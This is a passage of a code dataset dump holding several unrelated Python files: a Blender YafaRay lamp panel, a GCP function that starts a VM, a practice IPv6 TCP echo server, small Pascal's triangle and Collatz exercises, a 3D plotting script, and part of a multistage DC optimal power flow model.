bpy.props.BoolProperty(attr=\"spot_soft_shadows\")\nbpy.types.Lamp.shadow_fuzzyness = bpy.props.FloatProperty(attr=\"shadow_fuzzyness\", default = 1.0)\nbpy.types.Lamp.photon_only = bpy.props.BoolProperty(attr=\"photon_only\")\nbpy.types.Lamp.angle = bpy.props.IntProperty(attr=\"angle\",\n\t\tmax = 80,\n\t\tmin = 0)\nbpy.types.Lamp.ies_file = bpy.props.StringProperty(attr=\"ies_file\",subtype = 'FILE_PATH')\nbpy.types.Lamp.yaf_samples = bpy.props.IntProperty(attr=\"yaf_samples\", default = 16)\nbpy.types.Lamp.ies_cone_angle = 
bpy.props.FloatProperty(attr=\"ies_cone_angle\", default = 10.0)\nbpy.types.Lamp.ies_soft_shadows = bpy.props.BoolProperty(attr=\"ies_soft_shadows\")\n\n\nclass YAF_PT_lamp(bpy.types.Panel):\n\n\tbl_label = 'Lamp'\n\tbl_space_type = 'PROPERTIES'\n\tbl_region_type = 'WINDOW'\n\tbl_context = 'data'\n\tCOMPAT_ENGINES =['YAFA_RENDER']\n\n\t@classmethod\n\tdef poll(self, context):\n\n\t\tengine = context.scene.render.engine\n\n\t\timport properties_data_lamp\n\n\t\tif (context.lamp and (engine in self.COMPAT_ENGINES) ) :\n\t\t\ttry :\n\t\t\t\tproperties_data_lamp.unregister()\n\t\t\texcept: \n\t\t\t\tpass\n\t\telse:\n\t\t\ttry:\n\t\t\t\tproperties_data_lamp.register()\n\t\t\texcept: \n\t\t\t\tpass\n\t\treturn (context.lamp and (engine in self.COMPAT_ENGINES) ) \n\n\n\tdef draw(self, context):\n\n\t\tlayout = self.layout\n\t\tsplit = layout.split()\n\t\tcol = split.column()\n\n\t\tcol.prop(context.lamp,\"type\", text= \"Light Type\")\n\t\trow = layout.row()\n\t\tsplit = row.split()\n\t\tcol = row.column()\n\t\t\n\t\t#context.lamp.shadow_ray_samples = 16\n\n\t\tif context.lamp.type == 'AREA':\n\t\t\t\n\t\t\tcol.prop(context.lamp,\"yaf_samples\", text= \"Samples\")\n\t\t\tif context.lamp.type != 'AREA':\n\t\t\t\tcontext.lamp.type = 'AREA'\n\t\t\tcol.prop(context.lamp,\"size\", text= \"SizeX\")\n\t\t\tcol.prop(context.lamp,\"size_y\", text= \"SizeY\")\n\t\t\tcol.prop(context.lamp,\"create_geometry\", text= \"Create Geometry\")\n\n\n\t\telif context.lamp.type == 'Directional':\n\t\t\tif context.lamp.type != 'SUN':\n\t\t\t\tcontext.lamp.type = 'SUN'\n\t\t\tcol.prop(context.lamp,\"shadow_soft_size\", text= \"Radius\")\n\t\t\tcol.prop(context.lamp,\"infinite\", text= \"Infinite\")\n\n\t\telif context.lamp.type == 'Sphere':\n\t\t\tif context.lamp.type != 'POINT':\n\t\t\t\tcontext.lamp.type = 'POINT'\n\t\t\tcol.prop(context.lamp,\"shadow_soft_size\", text= \"Radius\")\n\t\t\tcol.prop(context.lamp,\"yaf_samples\", text= \"Samples\")\n\t\t\tcol.prop(context.lamp,\"create_geometry\", text= \"Create Geometry\")\n\n\n\t\telif context.lamp.type == 'SPOT':\n\t\t\t\n\t\t\tif context.lamp.type != 'SPOT':\n\t\t\t\tcontext.lamp.type = 'SPOT'\n\t\t\t\n\t\t\tcol.prop(context.lamp,\"spot_size\", text= \"Cone Angle\")\n\t\t\tcol.prop(context.lamp,\"spot_soft_shadows\", text= \"Soft Shadow\")\n\t\t\t\n\t\t\tif context.lamp.spot_soft_shadows:\n\t\t\t\tcol.prop(context.lamp,\"yaf_samples\", text= \"Samples\")\n\t\t\t\tcol.prop(context.lamp,\"shadow_fuzzyness\", text= \"Shadow Fuzzyness\")\n\t\t\tcol.prop(context.lamp,\"spot_blend\", text= \"Blend\")\n\t\t\tcol.prop(context.lamp,\"distance\", text= \"Distance\")\n\t\t\tcol.prop(context.lamp,\"photon_only\", text= \"Photon Only\")\n\t\t\t\n\t\t\t\n\t\telif context.lamp.type == 'SUN':\n\t\t\t\n\t\t\tif context.lamp.type != 'SUN':\n\t\t\t\tcontext.lamp.type = 'SUN'\n\t\t\tcol.prop(context.lamp,\"angle\", text= \"Angle\")\n\t\t\tcol.prop(context.lamp,\"yaf_samples\", text= \"Samples\")\n\t\t\n\t\telif context.lamp.type == 'POINT':\n\t\t\t\n\t\t\tif context.lamp.type != 'POINT':\n\t\t\t\tcontext.lamp.type = 'POINT'\n\t\t\t\n\t\t\n\t\telif context.lamp.type == 'IES':\n\t\t\tcol.prop(context.lamp,\"ies_file\",text = \"IES File\")\n\t\t\tif context.lamp.ies_soft_shadows:\n\t\t\t\tcol.prop(context.lamp,\"yaf_samples\",text = \"IES Samples\")\n\t\t\tcol.prop(context.lamp,\"ies_cone_angle\",text = \"IES Cone Angle\")\n\t\t\tcol.prop(context.lamp,\"ies_soft_shadows\",text = \"IES Soft Shadows\")\n\n\n\n\n\t\tcol.prop(context.lamp,\"color\", text= 
\"Color\")\n\t\tcol.prop(context.lamp,\"energy\", text= \"Power\")\n\n\nfrom properties_data_lamp import DATA_PT_preview\nfrom properties_data_lamp import DATA_PT_context_lamp\n\nclasses = [\n\tYAF_PT_lamp,\n]\n\ndef register():\n\tYAF_PT_lamp.prepend( DATA_PT_preview.draw )\n\tYAF_PT_lamp.prepend( DATA_PT_context_lamp.draw )\n\tregister = bpy.types.register\n\tfor cls in classes:\n\t\tregister(cls)\n\n\ndef unregister():\n\tbpy.types.YAF_PT_lamp.remove( DATA_PT_preview.draw )\n\tbpy.types.YAF_PT_lamp.remove( DATA_PT_context_lamp.draw )\n\tunregister = bpy.types.unregister\n\tfor cls in classes:\n\t\tunregister(cls)\n\n\nif __name__ == \"__main__\":\n\tregister()\n","sub_path":"ui/yaf_light.py","file_name":"yaf_light.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"389354868","text":"from googleapiclient import discovery\n\ndef start_server_pubsub(event, context):\n \n service = discovery.build('compute', 'v1')\n print('VM Instance starting')\n\n # Project ID for this request.\n project = 'minecraft-xxxxxx' \n\n # The name of the zone for this request.\n zone = 'australia-southeast1-a' \n\n # Name of the instance resource to start.\n instance = 'mc-server'\n\n request = service.instances().start(project=project, zone=zone, instance=instance)\n response = request.execute()\n\n print('VM Instance started')\n","sub_path":"compute/cloud_functions/start_compute/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"322475474","text":"# -*- coding:utf-8 -*-\n# create_time: 2019/2/28 15:10\n# __author__ = 'brad'\n\nimport socket\nfrom time import ctime\n\nHOST = ''\nPORT = 25555\nBUFSIZ = 1024\nADDR = (HOST, PORT)\n\ntcp_server_socket = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)\ntcp_server_socket.bind(ADDR) # 这就是绑定服务端的socket了\ntcp_server_socket.listen(5) # 启动监听,参数代表最多可以监听多少个客户端\n\nwhile True:\n print('等待连接')\n tcp_client_socket, addr = tcp_server_socket.accept() # 这就是在等待的一步,程序运行到这一步会等待客户端的连接。连接后就可以放回客户端的socket和地址\n print('连接来自:{}'.format(addr))\n\n while True:\n data = tcp_client_socket.recv(BUFSIZ)\n print(data.decode('utf-8'))\n print(data)\n if not data:\n break\n tcp_client_socket.send(bytes(ctime() + ': ', 'utf-8') + data) # 注意这里一定要用字节的形式,bypes()是个很好用的内置函数,另外,str的内置方法encode()和decode()也是很好的转圜方法。还有也可以在ascii字符串的前面加b,也可以转字符串。\n\n tcp_client_socket.close()\n\ntcp_server_socket.close()\n","sub_path":"socket_learn/tcp_inet6_server.py","file_name":"tcp_inet6_server.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"108976668","text":"# 1\n# 1 1\n# 1 2 1\n# 1 3 3 1\n# 1 4 6 4 1\n\n# f(row, 0) = 1\n# f(row, column) = 1 , if index of row is index of column\n# f(row,column) = f(row -1, column - 1) + f(row -1, column)\n\ndef pascalTriangle():\n rows, cols = (5, 5) \n arr = [[0 for i in range(cols)] for j in range(rows)] \n \n \n for i in range(0, rows):\n arr[i][0] = 1\n\n for i in range(1, rows):\n for j in range(0, cols):\n if i == j:\n arr[i][j] = 1\n else:\n arr[i][j] = arr[i-1][j-1] + arr[i-1][j]\n \n results = []\n for sublist in arr:\n result = []\n for idx in range(len(sublist)):\n if sublist[idx] != 0:\n result.append(sublist[idx])\n results.append(result)\n print (results)\n\n # for i in range(0,5):\n # for j in range(0,i):\n # print (arr[i][j], end = '')\n # print 
(\",\", end = '')\n # print ()\n\n \n\nif __name__ == \"__main__\":\n pascalTriangle()","sub_path":"Leetcode/dp/pascalTriangle.py","file_name":"pascalTriangle.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644453342","text":"# Practice Project - Chapter 3 - Collatz Sequence\n\ndef collatz(n):\n if (n % 2) == 0:\n number = n // 2\n return number\n elif (n % 2) == 1:\n number = 3 * n + 1\n return number\n\ndef get_result():\n try:\n in_n = int(input('Enter number: '))\n while in_n != 1:\n in_n = collatz(in_n)\n print(in_n)\n except ValueError:\n print('Please enter a number!')\nget_result()","sub_path":"part_1/03-functions/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"612434502","text":"#!/usr/bin/env python2\nimport csv\nfrom math import pow\n\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pylab as plt\n\n\nTEST_DATA_3D = \"data/pts3d.dat\"\nTEST_DATA_1 = \"data/pts1.dat\"\nTEST_DATA_2 = \"data/pts2.dat\"\n\n\ndef load_2d_data(fp, skip_header=True):\n csv_file = open(fp, 'r')\n csv_reader = csv.reader(csv_file)\n if skip_header:\n next(csv_reader, None)\n\n data = {\n \"x\": [], \"y\": [],\n }\n for line in csv_reader:\n data[\"x\"].append(float(line[0]))\n data[\"y\"].append(float(line[1]))\n\n return data\n\n\ndef load_3d_data(fp, skip_header=True):\n csv_file = open(fp, 'r')\n csv_reader = csv.reader(csv_file)\n if skip_header:\n next(csv_reader, None)\n\n data = {\n \"x\": [], \"y\": [], \"z\": [],\n }\n for line in csv_reader:\n data[\"x\"].append(float(line[0]))\n data[\"y\"].append(float(line[1]))\n data[\"z\"].append(float(line[2]))\n\n return data\n\n\ndef rotation_matrix(q):\n R_00 = 1.0 - 2.0 * pow(q[1], 2) - 2.0 * pow(q[2], 2)\n R_01 = 2.0 * q[0] * q[1] + 2.0 * q[3] * q[2]\n R_02 = 2.0 * q[0] * q[2] - 2.0 * q[3] * q[1]\n\n R_10 = 2.0 * q[0] * q[1] - 2.0 * q[3] * q[2]\n R_11 = 1.0 - 2.0 * pow(q[0], 2) - 2.0 * pow(q[2], 2)\n R_12 = 2.0 * q[1] * q[2] + 2.0 * q[3] * q[2]\n\n R_20 = 2.0 * q[0] * q[2] - 2.0 * q[3] * q[1]\n R_21 = 2.0 * q[1] * q[2] - 2.0 * q[3] * q[0]\n R_22 = 1.0 - 2.0 * pow(q[0], 2) - 2.0 * pow(q[1], 2)\n\n R = [\n [R_00, R_01, R_02],\n [R_10, R_11, R_12],\n [R_20, R_21, R_22]\n ]\n\n return np.matrix(R)\n\n\ndef plot_2dpts(q, t, pts, ax, color):\n pts[\"z\"] = []\n R = rotation_matrix(q)\n t = np.array(t)\n\n # transform point\n for i in range(len(pts[\"x\"])):\n pt = np.array([pts[\"x\"][i], pts[\"y\"][i], 0.0])\n pt = R.dot(pt + t).tolist()[0]\n\n pts[\"x\"][i] = pt[0]\n pts[\"y\"][i] = pt[1]\n pts[\"z\"].append(pt[2])\n\n # plot\n ax.scatter(pts[\"x\"], pts[\"y\"], pts[\"z\"], c=color)\n\n\ndef plot(pts3d, pts1, pts2):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection=\"3d\")\n\n # plot 3d points\n ax.scatter(pts3d[\"x\"], pts3d[\"y\"], pts3d[\"z\"], c=\"r\")\n\n # plot points 1\n q = [0.0, 0.0, 0.0, 1.0]\n t = [0.0, 0.0, 0.0]\n plot_2dpts(q, t, pts1, ax, \"g\")\n\n # plot points 2\n q = [0.0, -0.174, 0.0, 0.985]\n t = [1.0, 0.0, 0.0]\n plot_2dpts(q, t, pts2, ax, \"b\")\n\n for i in range(len(pts3d[\"x\"])):\n ax.plot(\n [pts3d[\"x\"][i], pts1[\"x\"][i]],\n [pts3d[\"y\"][i], pts1[\"y\"][i]],\n [pts3d[\"z\"][i], pts1[\"z\"][i]],\n c=\"g\"\n )\n\n for i in range(len(pts3d[\"x\"])):\n ax.plot(\n [pts3d[\"x\"][i], pts2[\"x\"][i]],\n [pts3d[\"y\"][i], pts2[\"y\"][i]],\n [pts3d[\"z\"][i], 
pts2[\"z\"][i]],\n c=\"b\"\n )\n\n # plot labels\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n ax.set_zlabel(\"z\")\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n pts3d = load_3d_data(TEST_DATA_3D)\n pts1 = load_2d_data(TEST_DATA_1)\n pts2 = load_2d_data(TEST_DATA_2)\n\n plot(pts3d, pts1, pts2)\n","sub_path":"scripts/plot/plot_3d_data.py","file_name":"plot_3d_data.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"29903366","text":"#*****************************************************#\n# This file is part of GRIDOPT. #\n# #\n# Copyright (c) 2015-2016, Tomas Tinoco De Rubira. #\n# #\n# GRIDOPT is released under the BSD 2-clause license. #\n#*****************************************************#\n\nfrom __future__ import print_function\nimport csv\nimport time\nimport pfnet as pf\nimport numpy as np\nfrom .utils import ApplyFunc\nfrom numpy.linalg import norm\nfrom gridopt.power_flow import new_method\nfrom optalg.lin_solver import new_linsolver\nfrom optalg.opt_solver.opt_solver_error import *\nfrom optalg.stoch_solver import StochProblemMS\nfrom optalg.opt_solver import OptSolverIQP,QuadProblem\nfrom scipy.sparse import triu,tril,bmat,coo_matrix,eye,block_diag,spdiags\n\nclass MS_DCOPF_Problem(StochProblemMS):\n \n # Parameters\n parameters = {'cost_factor' : 1e1, # factor for determining fast gen cost\n 'infinity' : 1e4, # infinity\n 'flow_factor' : 1.0, # factor for relaxing thermal limits\n 'p_ramp_max' : 0.01, # factor for constructing ramping limits for slow gens (fraction of pmax)\n 'r_ramp_max' : 0.10, # factor for constructing ramping limits for renewables (fraction of rmax)\n 'r_ramp_freq' : 0.10, # renewable ramping frequency \n 'r_eps' : 1e-3, # smallest renewable injection\n 'num_samples' : 1000, # number of samples\n 'draw': False, # drawing flag\n 'name': ''} # name\n\n def __init__(self,net,forecast,parameters={}):\n \"\"\"\n Class constructor.\n \n Parameters\n ----------\n net : PFNET Network\n forecast : dict\n parameters : dict\n \"\"\"\n \n # Check forecast\n assert('vargen' in forecast)\n assert('load' in forecast)\n assert('size' in forecast)\n assert(len(forecast['load']) == net.num_loads)\n assert(len(forecast['vargen']) == net.num_vargens)\n assert(set([len(v) for v in list(forecast['load'].values())]) == set([forecast['size']]))\n assert(set([len(v) for v in list(forecast['vargen'].values())]) == set([forecast['size']]))\n \n # Parameters\n self.parameters = MS_DCOPF_Problem.parameters.copy()\n self.set_parameters(parameters)\n \n # Save info\n self.T = forecast['size']\n self.corr_value = net.vargen_corr_value\n self.corr_radius = net.vargen_corr_radius\n\n # Branch flow limits\n for br in net.branches:\n if br.ratingA == 0.:\n br.ratingA = self.parameters['infinity']\n else:\n br.ratingA *= self.parameters['flow_factor']\n\n # Initial state\n for load in net.loads:\n load.P = forecast['load'][load.index][0]\n for vargen in net.var_generators:\n vargen.P = forecast['vargen'][vargen.index][0]\n dcopf = new_method('DCOPF')\n dcopf.set_parameters({'quiet': True, 'vargen_curtailment': True})\n dcopf.solve(net)\n assert(dcopf.results['status'] == 'solved')\n dcopf.update_network(net)\n \n # Counters\n num_w = net.num_buses-net.get_num_slack_buses() # voltage angles\n num_p = net.get_num_P_adjust_gens() # adjustable generators\n num_r = net.num_vargens # renewable generators\n num_l = net.num_loads # loads\n num_bus = net.num_buses # buses\n num_br = 
net.num_branches # branches\n \n # Variables\n net.clear_flags()\n net.set_flags('bus',\n 'variable',\n 'not slack',\n 'voltage angle')\n net.set_flags('generator',\n 'variable',\n 'adjustable active power',\n 'active power')\n net.set_flags('load',\n 'variable',\n 'any',\n 'active power')\n net.set_flags('variable generator',\n 'variable',\n 'any',\n 'active power')\n\n # Current values\n x = net.get_var_values()\n \n # Projections\n Pw = net.get_var_projection('bus','voltage angle')\n Pp = net.get_var_projection('generator','active power')\n Pl = net.get_var_projection('load','active power')\n Pr = net.get_var_projection('variable generator','active power')\n assert(Pw.shape == (num_w,net.num_vars))\n assert(Pp.shape == (num_p,net.num_vars))\n assert(Pl.shape == (num_l,net.num_vars))\n assert(Pr.shape == (num_r,net.num_vars))\n\n # Power flow equations\n pf_eq = pf.Constraint('DC power balance',net)\n pf_eq.analyze()\n pf_eq.eval(x)\n A = pf_eq.A.copy()\n b = pf_eq.b.copy()\n\n # Branch flow limits\n fl_lim = pf.Constraint('DC branch flow limits',net)\n fl_lim.analyze()\n fl_lim.eval(x)\n G = fl_lim.G.copy()\n hl = fl_lim.l.copy()\n hu = fl_lim.u.copy()\n assert(np.all(hl < hu))\n \n # Generation cost\n cost = pf.Function('generation cost',1.,net)\n cost.analyze()\n cost.eval(x)\n H = (cost.Hphi + cost.Hphi.T - triu(cost.Hphi))/net.base_power # symmetric, scaled\n g = cost.gphi/net.base_power - H*x # scaled\n\n # Bounds\n l = net.get_var_values('lower limits')\n u = net.get_var_values('upper limits')\n assert(np.all(Pw*l < Pw*u))\n assert(np.all(Pp*l < Pp*u))\n assert(np.all(Pl*l <= Pl*u))\n assert(np.all(Pr*l < Pr*u))\n\n # Renewable covariance\n from scikits.sparse.cholmod import cholesky\n r_cov = Pr*net.create_vargen_P_sigma(net.vargen_corr_radius,net.vargen_corr_value)*Pr.T\n r_cov = (r_cov+r_cov.T-triu(r_cov)).tocsc()\n factor = cholesky(r_cov)\n L,D = factor.L_D()\n P = factor.P()\n PT = coo_matrix((np.ones(P.size),(P,np.arange(P.size))),shape=D.shape)\n P = P.T\n D = D.tocoo()\n Dh = coo_matrix((np.sqrt(D.data),(D.row,D.col)),shape=D.shape)\n L = PT*L*Dh\n\n # Problem data\n self.num_p = num_p\n self.num_q = num_p\n self.num_w = num_w\n self.num_s = num_r\n self.num_r = num_r\n self.num_y = num_p\n self.num_z = num_br\n self.num_l = num_l\n self.num_bus = num_bus\n self.num_br = num_br\n self.num_x = self.num_p+self.num_q+self.num_w+self.num_s+self.num_y+self.num_z # stage vars\n\n self.p_max = Pp*u\n self.p_min = Pp*l\n self.p_prev = Pp*x\n \n self.q_max = Pp*u\n self.q_min = Pp*l\n \n self.w_max = self.parameters['infinity']*np.ones(self.num_w)\n self.w_min = -self.parameters['infinity']*np.ones(self.num_w)\n\n self.r_max = Pr*u\n\n self.z_max = hu\n self.z_min = hl\n\n dp = np.maximum(self.p_max-self.p_min,5e-2)\n self.y_max = self.parameters['p_ramp_max']*dp\n self.y_min = -self.parameters['p_ramp_max']*dp\n\n self.Hp = (Pp*H*Pp.T).tocoo()\n self.gp = Pp*g\n self.Hq = self.Hp*self.parameters['cost_factor']\n self.gq = self.gp*self.parameters['cost_factor']\n\n self.G = A*Pp.T\n self.C = A*Pp.T\n self.R = A*Pr.T\n self.A = -A*Pw.T\n self.J = G*Pw.T\n self.D = -A*Pl.T\n self.b = b\n \n self.Pp = Pp\n self.Pw = Pw\n self.Pr = Pr\n\n self.r_cov = r_cov\n self.L_cov = L\n self.L_sca = [np.sqrt(t/(self.T-1.)) for t in range(self.T)] # variance grows linearly\n\n self.Ip = eye(self.num_p,format='coo')\n self.Iy = eye(self.num_y,format='coo')\n self.Iz = eye(self.num_z,format='coo')\n\n self.Ow = coo_matrix((self.num_w,self.num_w))\n self.Os = coo_matrix((self.num_s,self.num_s))\n 
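# The permuted Cholesky factor L_cov assembled above satisfies L_cov*L_cov.T == r_cov\n        # (see the random-probe asserts in the checks below); sample_w() later draws correlated\n        # renewable noise as r_forecast[t] + L_sca[t]*(L_cov*randn(num_r)).\n        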
self.Oy = coo_matrix((self.num_y,self.num_y))\n self.Oz = coo_matrix((self.num_z,self.num_z))\n\n self.oq = np.zeros(self.num_q)\n self.ow = np.zeros(self.num_w)\n self.os = np.zeros(self.num_s)\n self.oy = np.zeros(self.num_y)\n self.oz = np.zeros(self.num_z)\n\n self.x_prev = np.hstack((self.p_prev,self.oq,self.ow,self.os,self.oy,self.oz)) # stage vars\n\n self.d_forecast = []\n self.r_forecast = []\n for t in range(self.T):\n for load in net.loads:\n load.P = forecast['load'][load.index][t]\n for gen in net.var_generators:\n gen.P = forecast['vargen'][gen.index][t]\n x = net.get_var_values()\n self.d_forecast.append(Pl*x)\n self.r_forecast.append(Pr*x)\n\n # Check problem data\n assert(net.num_vars == num_w+num_p+num_r+num_l)\n assert(self.num_p == self.num_q == self.num_y)\n assert(self.num_z == self.num_br)\n assert(np.all(self.p_min == 0.))\n assert(np.all(self.p_min < self.p_max))\n assert(np.all(self.q_min < self.q_max))\n assert(np.all(self.p_min == self.q_min))\n assert(np.all(self.p_max == self.q_max))\n assert(np.all(self.w_min < self.w_max))\n assert(np.all(self.z_min < self.z_max))\n assert(np.all(self.y_min < self.y_max))\n assert(np.all(self.Hp.row == self.Hp.col))\n assert(np.all(self.Hp.data > 0))\n assert(np.all(self.Hq.row == self.Hq.col))\n assert(np.all(self.Hq.data > 0))\n assert(np.all(self.Hq.data == self.parameters['cost_factor']*self.Hp.data))\n assert(np.all(self.gp >= 0))\n assert(np.all(self.gq == self.gp*self.parameters['cost_factor']))\n assert(self.gp.shape == self.gq.shape)\n assert(self.D.shape == (self.num_bus,self.num_l))\n assert(self.G.shape == (self.num_bus,self.num_p))\n assert(self.C.shape == (self.num_bus,self.num_q))\n assert(self.R.shape == (self.num_bus,self.num_s))\n assert(self.A.shape == (self.num_bus,self.num_w))\n assert(self.J.shape == (self.num_br,self.num_w))\n assert(self.b.shape == (self.num_bus,))\n assert(all([d.shape == (self.num_l,) for d in self.d_forecast]))\n assert(all([r.shape == (self.num_r,) for r in self.r_forecast]))\n assert(all([np.all(r < self.r_max) for r in self.r_forecast]))\n assert(all([np.all(r >= 0) for r in self.r_forecast]))\n assert(np.all(D.row == D.col))\n assert(np.all(Dh.row == Dh.col))\n assert(np.all(D.data > 0))\n assert(np.all(Dh.data > 0))\n assert(self.r_cov.shape == (self.num_r,self.num_r))\n for i in range(10):\n z = np.random.randn(self.num_r)\n assert(norm(self.r_cov*z-self.L_cov*self.L_cov.T*z) < 1e-10)\n\n # Construct base problems\n self.base_problem = []\n for t in range(self.T):\n self.base_problem.append(self.construct_base_problem(t))\n\n def construct_base_problem(self,t,tf=None):\n \"\"\"\n Constructs base problem for given time period.\n\n Parameters\n ----------\n t : int (initial stage)\n tf : int (end stage)\n\n Returns\n -------\n problem : QuadProblem\n \"\"\"\n\n if tf is None:\n tf = self.T-1\n \n assert(t >= 0)\n assert(t < self.T)\n assert(tf >= 0)\n assert(tf < self.T)\n assert(t <= tf)\n\n H_list = []\n g_list = []\n A_list = []\n b_list = []\n l_list = []\n u_list = []\n\n for i in range(tf-t+1):\n\n H = bmat([[self.Hp,None,None,None,None,None], # p\n [None,self.Hq,None,None,None,None], # q\n [None,None,self.Ow,None,None,None], # w\n [None,None,None,self.Os,None,None], # s\n [None,None,None,None,self.Oy,None], # y\n [None,None,None,None,None,self.Oz]], # z\n format='coo')\n\n g = np.hstack((self.gp, # p (add correction)\n self.gq, # q\n self.ow, # w\n self.os, # s\n self.oy, # y\n self.oz)) # z\n\n Arow1 = 6*(tf-t+1)*[None]\n Arow1[6*i:6*(i+1)] = 
[self.G,self.C,-self.A,self.R,None,None]\n \n Arow2 = 6*(tf-t+1)*[None]\n Arow2[6*i:6*(i+1)] = [self.Ip,None,None,None,-self.Iy,None]\n if i > 0:\n Arow2[6*(i-1)] = -self.Ip\n\n Arow3 = 6*(tf-t+1)*[None]\n Arow3[6*i:6*(i+1)] = [None,None,self.J,None,None,-self.Iz]\n\n H_list.append(H)\n g_list.append(g)\n\n A_list += [Arow1,Arow2,Arow3]\n b_list += [self.b+self.D*self.d_forecast[t+i],\n self.oy, # (add p_prev for first stage)\n self.oz]\n \n u_list += [self.p_max,\n self.q_max,\n self.w_max,\n self.r_max, # (add available r)\n self.y_max,\n self.z_max]\n l_list += [self.p_min,\n self.q_min,\n self.w_min,\n self.os,\n self.y_min,\n self.z_min]\n \n H = block_diag(H_list,format='coo')\n g = np.hstack(g_list)\n \n A = bmat(A_list,format='coo')\n b = np.hstack(b_list)\n\n # Stages after start stage\n if A_list[3:]:\n An = bmat([a[6:] for a in A_list[3:]],format='coo')\n bn = np.hstack((b_list[3:]))\n else:\n An = None\n bn = None\n\n u = np.hstack((u_list))\n l = np.hstack((l_list))\n\n # Checks\n num_vars = self.num_x*(tf-t+1)\n assert(H.shape == (num_vars,num_vars))\n assert(g.shape == (num_vars,))\n assert(A.shape == ((self.num_bus+self.num_p+self.num_z)*(tf-t+1),num_vars))\n assert(b.shape == ((self.num_bus+self.num_p+self.num_z)*(tf-t+1),))\n assert(u.shape == (num_vars,))\n assert(l.shape == (num_vars,))\n assert(np.all(l < u))\n\n # Problem\n problem = QuadProblem(H,g,A,b,l,u)\n problem.An = An\n problem.bn = bn\n return problem\n\n def construct_x(self,p=None,q=None,w=None,s=None,y=None,z=None):\n \"\"\"\n Constructs stage vector from components.\n \n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n\n return np.hstack((p,q,w,s,y,z))\n\n def eval_F(self,t,x,w):\n \"\"\"\n Evaluates current cost.\n \"\"\"\n \n p,q,w,s,y,z = self.separate_x(x)\n\n return (np.dot(self.gp,p) +\n 0.5*np.dot(p,self.Hp*p) + # slow gen cost\n np.dot(self.gq,q) +\n 0.5*np.dot(q,self.Hq*q)) # fast gen cost\n\n def separate_x(self,x):\n \"\"\"\n Separates stage vector into components.\n \n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n \n offset = 0\n p = x[offset:offset+self.num_p]\n offset += self.num_p\n \n q = x[offset:offset+self.num_q]\n offset += self.num_q\n\n w = x[offset:offset+self.num_w]\n offset += self.num_w\n\n s = x[offset:offset+self.num_s]\n offset += self.num_s\n\n y = x[offset:offset+self.num_y]\n offset += self.num_y\n\n z = x[offset:offset+self.num_z]\n offset += self.num_z\n\n return p,q,w,s,y,z\n\n def get_num_stages(self):\n \"\"\"\n Gets number of stages.\n \n Returns\n -------\n num : int\n \"\"\"\n \n return self.T\n\n def get_size_x(self):\n \"\"\"\n Gets size of stage vector x.\n\n Returns\n -------\n size : int\n \"\"\"\n\n return self.num_x\n\n def get_x_prev(self):\n \"\"\"\n Gets constant x for time before t=0.\n\n Returns\n -------\n x_prev : vector\n \"\"\"\n \n return self.x_prev\n\n def solve_stage_with_cuts(self,t,w,x_prev,A,b,quiet=False,tol=1e-4,init_data=None):\n \"\"\"\n Solves approximate stage problem for given realization of\n uncertainty and cuts that approximate cost-to-go function.\n \"\"\"\n \n assert(t >= 0)\n assert(t < self.T)\n assert(x_prev.shape == (self.num_x,))\n assert(A.shape[1] == self.num_x)\n assert(b.shape == (A.shape[0],))\n\n p_prev = x_prev[:self.num_p]\n inf = self.parameters['infinity']*1e2\n\n H = bmat([[self.Hp,None,None,None,None,None], # p\n [None,self.Hq,None,None,None,None], # q\n [None,None,self.Ow,None,None,None], # w\n [None,None,None,self.Os,None,None], # s\n [None,None,None,None,self.Oy,None], # y\n 
[None,None,None,None,None,self.Oz]], # z\n format='coo')\n\n g = np.hstack([self.gp, # p\n self.gq, # q\n self.ow, # w\n self.os, # s\n self.oy, # y\n self.oz]) # z\n\n Aeq = bmat([[self.G,self.C,-self.A,self.R,None,None], # power balance\n [self.Ip,None,None,None,-self.Iy,None], # ramp eq\n [None,None,self.J,None,None,-self.Iz]], # thermal lim eq\n format='coo')\n \n beq = np.hstack([self.b+self.D*self.d_forecast[t],\n p_prev,\n self.oz])\n \n u = np.hstack([self.p_max,\n self.q_max,\n self.w_max,\n w, # avail r\n self.y_max,\n self.z_max])\n l = np.hstack([self.p_min,\n self.q_min,\n self.w_min,\n self.os,\n self.y_min,\n self.z_min])\n \n # Cuts (h are slack vectors, v is scalar)\n num_cuts = A.shape[0]\n Oh = coo_matrix((num_cuts,num_cuts))\n oh = np.zeros(num_cuts)\n Ih = eye(num_cuts,format='coo')\n Ev = np.ones((num_cuts,1))\n Ov = coo_matrix((1,1))\n if num_cuts > 0:\n \n H = bmat([[H ,None,None],\n [None,Ov,None],\n [None,None,Oh]],\n format='coo')\n\n g = np.hstack((g,1.,oh))\n \n Aeq = bmat([[Aeq,None,None],\n [A,Ev,-Ih]],\n format='coo')\n \n beq = np.hstack((beq,\n -b))\n\n u = np.hstack((u,\n inf,\n np.ones(num_cuts)*inf))\n \n l = np.hstack((l, # x\n 0., # v\n oh)) # h (slack)\n \n # Construct problem\n QPproblem = QuadProblem(H,g,Aeq,beq,l,u)\n\n # Warm start\n if init_data is not None:\n x0 = init_data['x']\n lam0 = init_data['lam']\n mu0 = init_data['mu']\n pi0 = init_data['pi']\n QPproblem.x = np.hstack((x0,np.zeros(g.size-x0.size)))\n QPproblem.lam = np.hstack((lam0,np.zeros(beq.size-lam0.size)))\n QPproblem.mu = 